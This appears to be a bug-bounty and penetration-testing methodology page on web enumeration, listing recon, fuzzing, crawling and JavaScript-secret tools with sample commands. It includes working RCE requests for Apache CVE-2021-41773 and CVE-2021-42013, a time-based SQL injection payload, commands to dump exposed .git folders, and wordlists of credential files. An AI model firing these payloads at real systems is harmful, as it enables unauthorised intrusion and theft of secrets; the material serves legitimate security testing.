Web Enumeration

Recon, fuzzing and crawling

Recon

Also check for other exposed ports. Ex: 22, look for regsshion, etc. See Protocols

nmap -p 80,443,8000,8080,8180,8888,1000 --open -oA web_discovery -iL scope_list

GitHub - scmanjarrez/CVEScannerV2: Nmap script that scans for probable vulnerabilities based on services discovered in open ports.GitHub

GitHub - vulnersCom/nmap-vulners: NSE script based on Vulners.com APIGitHub

Leverage Shodan and find CVE

GitHub - iamunixtz/Lazy-Hunter: LazyHunter is an automated reconnaissance tool designed for bug hunters, leveraging Shodan's InternetDB and CVEDB APIsGitHub

EyeWitness or Aquatone - See Information Gathering

Fingerprinting / Crawling

GitHub - blackhatethicalhacking/SecretOpt1c: SecretOpt1c is a Red Team tool that helps uncover sensitive information in websites using ACTIVE and PASSIVE Techniques for Superior Accuracy!GitHub

GitHub - chm0dx/creepyCrawler: OSINT tool to crawl a site and extract useful recon info.GitHub

SSL / TLS

GitHub - testssl/testssl.sh: Testing TLS/SSL encryption anywhere on any portGitHub

GitHub - projectdiscovery/tlsx: Fast and configurable TLS grabber focused on TLS based data collection.GitHub

HTTP/2 - DoS

Basic vulnerability scanning to see if web servers may be vulnerable to CVE-2023-44487

GitHub - bcdannyboy/CVE-2023-44487: Basic vulnerability scanning to see if web servers may be vulnerable to CVE-2023-44487GitHub

HTTP Downgrading

HTTP downgrading is the process of forcing a request to be processed under HTTP/1.1 instead of HTTP/2.

1. Open Burp Suite and Navigate to Proxy → HTTP History

2. Locate the request that is currently using HTTP/2.

3. Send the Request to Repeater

4. In the Repeater tab, open the "Inspector" panel → Request Attributes → Protocol

5. Change HTTP Version to HTTP/1.1

6. Click "Send" in Repeater.

If successful, you should receive a valid response, confirming the server accepts HTTP/1.1.

Now, test for request smuggling

HTTP Request Smuggling

HTTP Methods

GitHub - ShutdownRepo/httpmethods: HTTP verb tampering & methods enumerationGitHub

HTTP Verb Tampering

Apache Vulnerability Testing

GitHub - mrmtwoj/apache-vulnerability-testing: Apache HTTP Server Vulnerability Testing Tool | PoC for CVE-2024-38472 , CVE-2024-39573 , CVE-2024-38477 , CVE-2024-38476 , CVE-2024-38475 , CVE-2024-38474 , CVE-2024-38473 , CVE-2023-38709GitHub

GitHub - TAM-K592/CVE-2024-40725-CVE-2024-40898: CVE-2024-40725 and CVE-2024-40898, affecting Apache HTTP Server versions 2.4.0 through 2.4.61. These flaws pose significant risks to web servers worldwide, potentially leading to source code disclosure and server-side request forgery (SSRF) attacks.GitHub

• CVE-2021-41773 (RCE and LFI)

POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Content-Length: 7
Content-Type: application/x-www-form-urlencoded
Connection: close

echo;id

• CVE-2021-42013 (RCE and LFI)

POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

echo;id

Bug-Bounty-Methodology/Technologies/Apache HTTP Server.md at main · trilokdhaked/Bug-Bounty-MethodologyGitHub

Scan for credz

GitHub - m14r41/scan4secrets: SAST and DAST Scan Supported with 400 plus rules available for secrets and allow you add your own wordlist as well. lightweight source code scanner and for URL that detects hardcoded secrets like API keys, credentials, and sensitive information across files and folders.GitHub

Header Exploit

GitHub - c0dejump/HExHTTP: Header Exploitation HTTPGitHub

Common files

GitHub - Bo0oM/fuzz.txt: Potentially dangerous filesGitHub

.git
.gitkeep
.git-rewrite
.gitreview
.git/HEAD
.gitconfig
.git/index
.git/logs
.svnignore
.gitattributes
.gitmodules
.svn/entries
.DS_Store
.env
debug.log
backup/
admin.bak
database.sql
composer.lock

robots.txt

-> robofinder: search for and retrieve historical robots.txt files from Archive.org for any given website.

GitHub - Spix0r/robofinder: Robofinder retrieves historical #robots.txt files from #Archive.org, allowing you to uncover previously disallowed directories and paths for any domain—essential for deepening your #OSINT and #recon process.GitHub

.git

.svn

.DS_Store

.env

GitHub - lijiejie/ds_store_exp: A .DS_Store file disclosure exploit. It parses .DS_Store file and downloads files recursively.GitHub

# python ds_store_exp.py http://10.13.X.X/.DS_Store   
[200] http://10.13.X.X/.DS_Store
[200] http://10.13.X.X/JS/.DS_Store
[200] http://10.13.X.X/Images/.DS_Store
[200] http://10.13.X.X/dev/.DS_Store
<--SNIP-->

.DS_Store Files and Why You Should Know About Them - BuildThisBuildThis

What happened After I Scanned 2.6 Million Domains for Exposed .DS_Store Files | HackerNoonhackernoon

The risk of .DS_Store - CyberAntCyberAnt

Cloudflare - Internal IP leakage

/cdn-cgi/trace on live hosts — it leaks internal IPs

sitemap.xml

Time based SQL injection: sleep payload [1;SELECT IF((8303>8302),SLEEP(9),2356)#] = 9s

target[.]com/sitemap.xml?offset=1;SELECT IF((8303>8302),SLEEP(9),2356)# 

SQL Injection

Misconfigurations on popular third-party services

https://github.com/intigriti/misconfig-mappergithub.com

Exploring Third-Party Services for Open Signups: Security Risks and Best PracticesIntigriti

Git Exposed

DotGit Extension - Firefox and Chrome https://addons.mozilla.org/en-US/firefox/addon/dotgit/

cat domains.txt | nuclei -t gitExposed.yaml

Nuclei Template: https://github.com/coffinxp/priv8-Nuclei/blob/main/git-exposed.yaml

id: git-exposed

info:
  name: Exposed Git Repository
  author: kaks3c
  severity: medium
  description: |
    Checks for exposed Git repositories by making requests to potential Git repository paths.
  tags: p3,logs,git

http:
  - raw:
      - |
        GET {{BaseURL}}{{path}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:119.0) Gecko/20100101 Firefox/119.0
        Accept: */*
        Accept-Language: en-US,en;q=0.5
        Connection: close

    attack: pitchfork
    payloads:
      path:
        - /.git/
        - /.git/HEAD
        - /.git/config
        - /.git/logs/HEAD
        - /.git/logs/
        - /.git/description
        - /.git/refs/heads/
        - /.git/refs/remotes/
        - /.git/objects/

    matchers-condition: or
    matchers:
      - type: word
        words:
          - "commit (initial): Initial commit" #/.git/logs/HEAD
          - "ref: refs/heads/" #/.git/HEAD
          - "logallrefupdates = true" #/.git/config
          - "repositoryformatversion = 0" #/.git/config
          - "Index of /" #/.git/
          - "You do not have permission to access /.git/" #403_/.git
          - "Unnamed repository; edit this file 'description' to name the repository" #/.git/description

      - type: regex
        regex:
          - "info/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" #/.git/objects/
          - "pack/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" #/.git/objects/
          - "master/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" #/.git/refs/heads/
          - "origin/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" #/.git/refs/remotes/
          - "refs/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}"  #/.git/logs/

    stop-at-first-match: true

.git found => download the target .git folder

wget -r -np -nH --cut-dirs=1 -R "index.html*" http://dev.dumpme.htb/.git/

Or with tools:

The best tool is goop

GitHub - nyancrimew/goop: Yet another tool to dump a git repository from a website, focused on as-complete-as-possible dumps and handling weird edge-cases.GitHub

$ git clone https://github.com/deletescape/goop
$ cd goop
$ go build
$ ./goop http://dev.dumpme.htb  

GitHub - lijiejie/GitHack: A `.git` folder disclosure exploitGitHub

GitHub - WangYihang/GitHacker: 🕷️ A `.git` folder exploiting tool that is able to restore the entire Git repository, including stash, common branches and common tags.GitHub

GitHub - Ebryx/GitDump: A pentesting tool that dumps the source code from .git even when the directory traversal is disabledGitHub

After that, search for creds, vulnerabilities, etc:

Credentials in git repos

GitHub - finding vulnerabilities

SVN Expoxed

GitHub - anantshri/svn-extractor: simple script to extract all web resources by means of .SVN folder exposed over network.GitHub

./svn-extractor.py --url http://url.com --match database.php

PHPMyAdmin

target[.]com/phpmyadmin/setup/index.php ==> 301 to login page

target[.]com/phpMyAdmin/setup/index.php ==> 200 to phpmyadmin setup

AdminDirectoryFinder

GitHub - tausifzaman/AdminDirectoryFinder: Admin Directory Finder is a tool designed to scan and identify directories under admin paths, such as admin/dashboard.php. It helps in security testing by detecting hidden or sensitive admin panels within a web application. Ideal for penetration testers and developers to ensure proper access control and security measures.GitHub

WSAAR

GitHub - Nishacid/WSAAR: Auto-Recon script that will help you in the Burp Suite Certified Practitioner Examor with any web-security lab.GitHub

OWASP Noir

GitHub - owasp-noir/noir: Attack surface detector that identifies endpoints by static analysisGitHub

$ noir -b . -u http://example.com
$ noir -b . -u http://example.com --passive-scan

URLScan.io

Check URLScan as a complement to Wayback Machine

Information Gathering

WaybackLister

Reconnaissance tool that taps into the Wayback Machine to fetch historical URLs for a domain, parses unique paths, and checks if any of those paths currently expose directory listings

GitHub - anmolksachan/wayBackLister: A New Approach to Directory Bruteforce with WaybackLister v1.0GitHub

python waybacklister.py -d target.com

Wayback Machine

GitHub - mhmdiaa/chronos: Wayback Machine OSINT FrameworkGitHub

# RECON METHOD BY ~/.COFFINXP

https://web.archive.org/cdx/search/cdx?url=*.example.com/*&collapse=urlkey&output=text&fl=original

curl -G "https://web.archive.org/cdx/search/cdx" --data-urlencode "url=*.example.com/*" --data-urlencode "collapse=urlkey" --data-urlencode "output=text" --data-urlencode "fl=original" > out.txt

cat out.txt | uro |  grep -E '\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5|\.exe|\.dll|\.bin|\.ini|\.bat|\.sh|\.tar|\.deb|\.rpm|\.iso|\.img|\.apk|\.msi|\.dmg|\.tmp|\.crt|\.pem|\.key|\.pub|\.asc'

Information Gathering

GitHub - AnonKryptiQuz/TimeVault: TimeVault is a specialized automated tool designed to detect potential information disclosure vulnerabilities in web applications by leveraging archived URLs from the Wayback Machine.GitHub

GitHub - xnl-h4ck3r/waymore: Find way more from the Wayback Machine!GitHub

GitHub - tomnomnom/waybackurls: Fetch all the URLs that the Wayback Machine knows about for a domainGitHub

Backup Files

ffuf -w subdomains.txt:SUB -w payloads/backup_files_only.txt:FILE -u https://SUB/FILE -mc 200 -rate 50  -fs 0 -c -x http://localip:8080

payloads/backup_files_only.txt at main · coffinxp/payloadsGitHub

Fuzzili

GitHub - musana/fuzzuli: fuzzuli is a url fuzzing tool that aims to find critical backup files by creating a dynamic wordlist based on the domain.GitHub

echo http://target.com | fuzzuli -p

Burp Extension

Backup Finder

Archived Backups

GitHub - anmolksachan/WayBackupFinder: A passive way to find backups/ sensitive information.GitHub

Unlock Hidden Backups with wayBackupFinder.pyMedium

Look for metadata

Extract URLs and paths from web pages

Manually

https://0-a.nl/jsendpoints.txt

javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})();

Open Console (ctrl + shift + i) + Allow pasting ("autoriser le collage") + copy paste JS code + click on bookmark

Source: NahamCon2024: .js Files Are Your Friends | @zseano https://www.youtube.com/watch?v=fQoxjBwQZUA

Crawling

Gourlex

gourlex -t domain.com

GitHub - trap-bytes/gourlex: Gourlex is a simple tool that can be used to extract URLs and paths from web pages.GitHub

xnLinkFinder

GitHub - xnl-h4ck3r/xnLinkFinder: A python tool used to discover endpoints for a given targetGitHub

xnLinkfinder -i bugcrowd.com -sp https://www.bugcrowd.com -sf "bugcrowd.*" -d2 -v

Command breakdown:

-i http://bugcrowd.com  → Target domain 
-sp https://bugcrowd.com  → Scope prefix 
-sf "bugcrowd.*" → Scope filter 
-d 2 → Crawl depth 
https://github.com/mhmdiaa/chronos
-v → Verbose output

Hakrawler

GitHub - hakluke/hakrawler: Simple, fast web crawler designed for easy, quick discovery of endpoints and assets within a web applicationGitHub

echo https://google.com | hakrawler

Waybackurls

GitHub - tomnomnom/waybackurls: Fetch all the URLs that the Wayback Machine knows about for a domainGitHub

Katana & Urlfinder

katana -u https://tesla.com

GitHub - projectdiscovery/katana: A next-generation crawling and spidering framework.GitHub

urlfinder -d tesla.com

GitHub - projectdiscovery/urlfinder: A high-speed tool for passively gathering URLs, optimized for efficient and comprehensive web asset discovery without active scanning.GitHub

GetAllURL - gau

GitHub - lc/gau: Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl.GitHub

gau https://target.com

LinkFinder

GitHub - GerbenJavado/LinkFinder: A python script that finds endpoints in JavaScript filesGitHub

python3 linkfinder.py -i https://example.com/app.js

$ python linkfinder.py -i 'js/*' -o result.html
$ python linkfinder.py -i 'js/*' -o cli

LazyEgg

GitHub - schooldropout1337/lazyeggGitHub

ReconSpider

See Fingerprinting / Crawling

Metadata

Metadata and Hidden infos

JS Files

Sensitive JS Files

ffuf -w subdomains.txt:SUB -w payloads/senstivejs.txt:FILE -u https://SUB/FILE -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0" -fs 0 -c -mc 200 -fr false -rate 10 -t 10

payloads/senstivejs.txt at main · 0xSs0rZ/payloadsGitHub

/js/config.js
/js/credentials.js
/js/secrets.js
/js/keys.js
/js/password.js
/js/api_keys.js
/js/auth_tokens.js
/js/access_tokens.js
/js/sessions.js
/js/authorization.js 
/js/encryption.js
/js/certificates.js
/js/ssl_keys.js
/js/passphrases.js 
/js/policies.js
/js/permissions.js 
/js/privileges.js
/js/hashes.js
/js/salts.js
/js/nonces.js
/js/signatures.js
/js/digests.js
/js/tokens.js
/js/cookies.js
/js/topsecr3tdonotlook.js

Burp

Source: NahamCon2024: .js Files Are Your Friends | @zseano https://www.youtube.com/watch?v=fQoxjBwQZUA

JavaScript Analysis for Pentesterskpwn.de

wget -i urls.txt

Detect secrets

./trufflehog filesystem ~/Downloads/js --no-verification --include-detectors="all"

Burp Extension

TruffleHog Integration

Code Analysis

Code Analysis

semgrep scan --config auto

JSFScan.sh

1 - Gather Jsfile Links from different sources.
2 - Import File Containing JSUrls
3 - Extract Endpoints from Jsfiles
4 - Find Secrets from Jsfiles
5 - Get Jsfiles store locally for manual analysis
6 - Make a Wordlist from Jsfiles
7 - Extract Variable names from jsfiles for possible XSS.
8 - Scan JsFiles For DomXSS.
9 - Generate Html Report.

GitHub - KathanP19/JSFScan.sh: Automation for javascript recon in bug bounty.GitHub

bash JFScan.sh -l target.txt --all -r -o outputdir

Morgan

Identify sensitive information, vulnerabilities, and potential risks within JavaScript files on websites

GitHub - VFA250/Morgan: Morgan is a powerful tool designed to help security researchers, developers, and security auditors identify sensitive information, vulnerabilities, and potential risks within JavaScript files on websites.GitHub

Gouge - Burp extension to extract URLs which are seen in JS files

GitHub - mqst/gouge: Gouge is a simple Burp extension to extract or gouge all URLs which are seen in JS files as you visit different websites/webpages in Burp SuiteGitHub

GetJS

GitHub - 003random/getJS: A tool to fastly get all javascript sources/filesGitHub

JSHunter

Endpoint Extraction and Sensitive Data Detection

cat urls.txt | grep "\.js" | jshunter

GitHub - cc1a2b/jshunter: JShunter is a command-line tool designed for analyzing JavaScript files and extracting endpoints. This tool specializes in identifying sensitive data, such as API endpoints and potential security vulnerabilities, making it an essential resource for developers and security researchers.GitHub

Javascript Deobfuscator

GitHub - ben-sb/javascript-deobfuscator: General purpose JavaScript deobfuscatorGitHub

Online

JavaScript Deobfuscator

API Endpoint in JS File

cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u

JSNinja

GitHub - iamunixtz/JSNinja: JSNinja is a powerful tool designed for security researchers and developers looking to extract sensitive information and Urls from JavaScript files.GitHub

JS Link Finder

JS Link Finder

Jsluice

GitHub - BishopFox/jsluice: Extract URLs, paths, secrets, and other interesting bits from JavaScriptGitHub

GitHub - 0x999-x/jsluicepp: jsluice++ is a Burp Suite extension designed for passive and active scanning of JavaScript traffic using the CLI tool jsluiceGitHub

API

Sensitive data in JS Files

Top 25 JavaScript path files used to store sensitive information

/js/config.js
/js/credentials.js
/js/secrets.js
/js/keys.js
/js/password.js
/js/api_keys.js
/js/auth_tokens.js
/js/access_tokens.js
/js/sessions.js
/js/authorization.js 
/js/encryption.js
/js/certificates.js
/js/ssl_keys.js
/js/passphrases.js 
/js/policies.js
/js/permissions.js 
/js/privileges.js
/js/hashes.js
/js/salts.js
/js/nonces.js
/js/signatures.js
/js/digests.js
/js/tokens.js
/js/cookies.js
/js/topsecr3tdonotlook.js

GitHub - BishopFox/jsluice: Extract URLs, paths, secrets, and other interesting bits from JavaScriptGitHub

GitHub - iamunixtz/JSNinja: JSNinja is a powerful tool designed for security researchers and developers looking to extract sensitive information and Urls from JavaScript files.GitHub

Sensitive Data (API Key, JWT token, etc.) Exposed

JS Miner - Burp Extension

X-Keys - Burp Extension

GitHub - vsec7/BurpSuite-Xkeys: A Burp Suite Extension to extract interesting strings (key, secret, token, or etc.) from a webpage.GitHub

jsluice++ - Burp Extension

GitHub - 0x999-x/jsluicepp: jsluice++ is a Burp Suite extension designed for passive and active scanning of JavaScript traffic using the CLI tool jsluiceGitHub

SecretFinder

GitHub - m4ll0k/SecretFinder: SecretFinder - A python script for find sensitive data (apikeys, accesstoken,jwt,..) and search anything on javascript filesGitHub

Mantra

GitHub - MrEmpy/mantra: 「🔑」A tool used to hunt down API key leaks in JS files and pagesGitHub

Testing API Key

GitHub - streaak/keyhacks: Keyhacks is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.GitHub

Google Maps API Key

GitHub - ozguralp/gmapsapiscannerGitHub

Hidden Parameter

This useful option in Burp Suite makes every hidden input field (often with a reference to a hidden parameter) visible

Proxy Settings >>> Response modification rules >>> Unhide hidden form fields

Parameters fuzzing

x8

Hidden parameters discovery

GitHub - Sh1Yo/x8: Hidden parameters discovery suiteGitHub

Arjun

GitHub - s0md3v/Arjun: HTTP parameter discovery suite.GitHub

Hacker tools: Arjun – The parameter discovery toolIntigriti

$ python3 /opt/Arjun/arjun.py -u http://target_address.com

$ python3 /opt/Arjun/arjun.py -u http://target_address.com -o arjun_results.json

If you’ve been proxying traffic with Burp Suite, you can select all URLs within the sitemap, use the Copy Selected URLs option, and paste that list to a text file. Then run Arjun against all Burp Suite targets simultaneously, like this:

$ python3 /opt/Arjun/arjun.py -i burp_targets.txt

Parmahunter

GitHub - nullenc0de/paramhunter: Looks for parameters in urlsGitHub

Wordlists

Try /usr/share/wordlists/seclists/Discovery/Web-Content/quickhits.txt first, then https://github.com/Karanxa/Bug-Bounty-Wordlists/blob/main/fuzz.txt

Fuzzing

fuzz.txt/fuzz.txt at master · Bo0oM/fuzz.txtGitHub

GitHub - p0dalirius/webapp-wordlists: This repository contains wordlists for each versions of common web applications and content management systems (CMS). Each version contains a wordlist of all the files directories for this version.GitHub

GitHub - Karanxa/Bug-Bounty-Wordlists: A repository that includes all the important wordlists used while bug hunting.GitHub

• dirb lists

• https://wordlists.assetnote.io/
• SecList: https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content
• BugBounty All Fuzz: https://raw.githubusercontent.com/Karanxa/Bug-Bounty-Wordlists/refs/heads/main/all_fuzz.txt
• Common extensions: raft-[ small | medium | large ]-extensions.txt from SecList Web-Content

• Create wordlist - CeWL

cewl -m5 --lowercase -w wordlist.txt http://192.168.10.10

Fuzz using different HTTP methods

ffuf -u https://api.example.com/PATH -X METHOD -w /path/to/wordlist:PATH -w /path/to/http_methods:METHOD

Admin interfaces

Bug-Bounty-Wordlists/admin.txt at main · Karanxa/Bug-Bounty-WordlistsGitHub

Backups

Bug-Bounty-Wordlists/backup_files_only.txt at main · Karanxa/Bug-Bounty-WordlistsGitHub

Bug-Bounty-Wordlists/backup_files_with_path.txt at main · Karanxa/Bug-Bounty-WordlistsGitHub

Config files

Bug-Bounty-Wordlists/config.txt at main · Karanxa/Bug-Bounty-WordlistsGitHub

Bug-Bounty-Wordlists/webconfig.txt at main · Karanxa/Bug-Bounty-WordlistsGitHub

Bug-Bounty-Wordlists/git_config.txt at main · Karanxa/Bug-Bounty-WordlistsGitHub

SQL files

Bug-Bounty-Wordlists/sql.txt at main · Karanxa/Bug-Bounty-WordlistsGitHub

Vulnerability Assessment

Vulnerability Scanners

Port Scan

sudo nmap 10.129.2.28 -p 80 -sV --script vuln 

Nmap scan report for 10.129.2.28
Host is up (0.036s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-enum:
|   /wp-login.php: Possible admin folder
|   /readme.html: Wordpress version: 2
|   /: WordPress version: 5.3.4
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|   /wp-login.php: Wordpress login page.
|   /wp-admin/upgrade.php: Wordpress login page.
|_  /readme.html: Interesting, a readme.
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-wordpress-users:
| Username found: admin
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
| vulners:
|   cpe:/a:apache:http_server:2.4.29:
|     	CVE-2019-0211	7.2	https://vulners.com/cve/CVE-2019-0211
|     	CVE-2018-1312	6.8	https://vulners.com/cve/CVE-2018-1312
|     	CVE-2017-15715	6.8	https://vulners.com/cve/CVE-2017-15715

GitHub - scmanjarrez/CVEScannerV2: Nmap script that scans for probable vulnerabilities based on services discovered in open ports.GitHub

GitHub - vulnersCom/nmap-vulners: NSE script based on Vulners.com APIGitHub

Lostfuzzer

GitHub - coffinxp/lostfuzzer: A Bash script for automated nuclei dast scanning by using passive urlsGitHub

Admin interface

Password lists

CMS

GitHub - Tuhinshubhra/CMSeeK: CMS Detection and Exploitation suite - Scan WordPress, Joomla, Drupal and over 180 other CMSsGitHub

CMS

Crawling

Crawl with 2 separate user-agent

Always crawl with 2 separate user-agent headers, one for desktop and one for mobile devices and look for response changes!

gospider -s "http://app.example.com" -c 3 --depth 3 --no-redirect --user-agent "Mozilla/5.0 (iPhone; CPU iPhone OS 15_1_1 like Mac OS X..." -o mobile_endpoints.txt

Gospider

GitHub - jaeles-project/gospider: Gospider - Fast web spider written in GoGitHub

GoSpider - Hacker Tools: Enumerate the web! 👩‍💻Intigriti

Hakrawler

GitHub - hakluke/hakrawler: Simple, fast web crawler designed for easy, quick discovery of endpoints and assets within a web applicationGitHub

With Burp

Running a full crawl and auditBurp_Suite

With Zap

The ZAP Homepage

sudo snap install zaproxy --classic

• Spidering

• Fuzzing

Fuzz

Wordlists

Fuzzing

gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt

ffuf -recursion -recursion-depth 1 -u http://192.168.10.10/FUZZ -w /opt/useful/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt

ffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://192.168.10.10/FOLDERS/WORDLISTEXTENSIONS

Admin interface=> Password guessing

CMS

Banner grabbing

curl -IL https://www.inlanefreight.com

Tool: https://github.com/FortyNorthSecurity/EyeWitness ; or Aquatone

Information Gathering

whatweb 10.10.10.121
whatweb --no-errors 10.10.10.0/24

DNS Subdomain Enumeration

DNS Subdomain Enumeration

Cloudflare Bypass for Web Scraping

GitHub - sarperavci/CloudflareBypassForScraping: A cloudflare verification bypass script for webscrapingGitHub

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

• The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
• Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
• Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.